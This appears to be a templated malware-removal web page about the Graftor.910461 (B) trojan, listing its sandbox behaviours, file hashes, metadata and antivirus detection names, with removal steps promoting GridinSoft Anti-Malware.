Malware

Graftor.910461 (B) removal tips

Malware Removal

The Graftor.910461 (B) is considered dangerous by lots of security experts. When this infection is active, you may notice unwanted processes in Task Manager list. In this case, it is adviced to scan your computer with GridinSoft Anti-Malware.

GridinSoft Anti-Malware

Gridinsoft Anti-Malware

Removing PC viruses manually may take hours and may damage your PC in the process. We recommend using GridinSoft Anti-Malware for virus removal. Allows to complete scan and cure your PC during the trial period.
DOWNLOAD NOW
6-day free trial available.

What Graftor.910461 (B) virus can do?

  • SetUnhandledExceptionFilter detected (possible anti-debug)
  • Dynamic (imported) function loading detected
  • Reads data out of its own binary image
  • A process created a hidden window
  • A HTTP/S link was seen in a script or command line
  • Executed a very long command line or script command which may be indicative of chained commands or obfuscation
  • Authenticode signature is invalid
  • A scripting utility was executed
  • Uses Windows utilities for basic functionality
  • A cryptomining command was executed
  • Attempts to execute suspicious powershell command arguments

How to determine Graftor.910461 (B)?



File Info:

name: D3CE44AA2681EF93B4D5.mlw
path: /opt/CAPEv2/storage/binaries/1168cdc0d5a525c728fbfccd5d80e954f0da9da3fc2dd08a202b70670cfca58a
crc32: 17E57333
md5: d3ce44aa2681ef93b4d522b5483e47ef
sha1: 789dd25595dbcb22ab8decd58e40d95821196872
sha256: 1168cdc0d5a525c728fbfccd5d80e954f0da9da3fc2dd08a202b70670cfca58a
sha512: 02810487f8ee427672077f9a525c440a7e95f01c7f61ad284bdc3e0fc53d336696942ad4c6e237867d1e06bdcf5c1c493f585bb3329551bb6462e9631287301a
ssdeep: 98304:XbMbfPU4NBS2bB2FzJVxbD8AL+i9sGax2o0kxxl5gd+Ke:XbMzPU4rPbG7LGx2Wwd+N
type: PE32 executable (GUI) Intel 80386, for MS Windows
tlsh: T10546332236EB55B3D7F93C700B766E5984F5D13F82320D6BAB241300A8A29DD553ABC7
sha3_384: 0d411a7e1948cb4f93b660725894781954eb254dc3d0ff409d4cd20f78a480f0459fdd8c9ac40b964179b7762a4ff797
ep_bytes: 558bec6aff68a0964100683066410064
timestamp: 2016-04-02 22:14:17


Version Info:

Comments: Control A Software
CompanyName: Control A Software
FileDescription: Control A Software
LegalCopyright: Control A Software
LegalTrademarks: Control A Software
ProductName: Control A Software
FileVersion: 24.7.237
ProductVersion: 24.7.237
InternalName: Control A
OriginalFilename: Control A.exe
Translation: 0x0407 0x04b0

Graftor.910461 (B) also known as:

Elasticmalicious (high confidence)
MicroWorld-eScanGen:Variant.Graftor.910461
ALYacGen:Variant.Graftor.910461
Cybereasonmalicious.a2681e
APEXMalicious
AvastWin32:7Drop-D [Trj]
Ad-AwareGen:Variant.Graftor.910461
EmsisoftGen:Variant.Graftor.910461 (B)
BitDefenderThetaGen:NN.ZexaF.34182.@t3@a87Omzgi
ZillyaTrojan.Agent.Win32.1412561
FireEyeGen:Variant.Graftor.910461
SophosTroj/Agent-BGQN
JiangminTrojan.Alien.gk
AviraHEUR/AGEN.1143645
ArcabitTrojan.Graftor.DDE47D
ZoneAlarmHEUR:Trojan-Downloader.Win32.Miner.gen
MicrosoftTrojan:Win32/Sabsik.FL.B!ml
CynetMalicious (score: 99)
RisingMalware.AbnormalStub/SFX!1.D758 (CLASSIC)
SentinelOneStatic AI – Suspicious PE
FortinetW32/CoinMiner.910461!tr
AVGWin32:7Drop-D [Trj]

How to remove Graftor.910461 (B)?

Graftor.910461 (B) removal tool
  • Download and install GridinSoft Anti-Malware.
  • Open GridinSoft Anti-Malware and perform a “Standard scan“.
  • Move to quarantine” all items.
  • Open “Tools” tab – Press “Reset Browser Settings“.
  • Select proper browser and options – Click “Reset”.
  • Restart your computer.

You may also like

About the author

Paul Valéry

I'm a cyber security analyst and data science expert with 5+ years of experience with security software contractors.

View all posts

Leave a Comment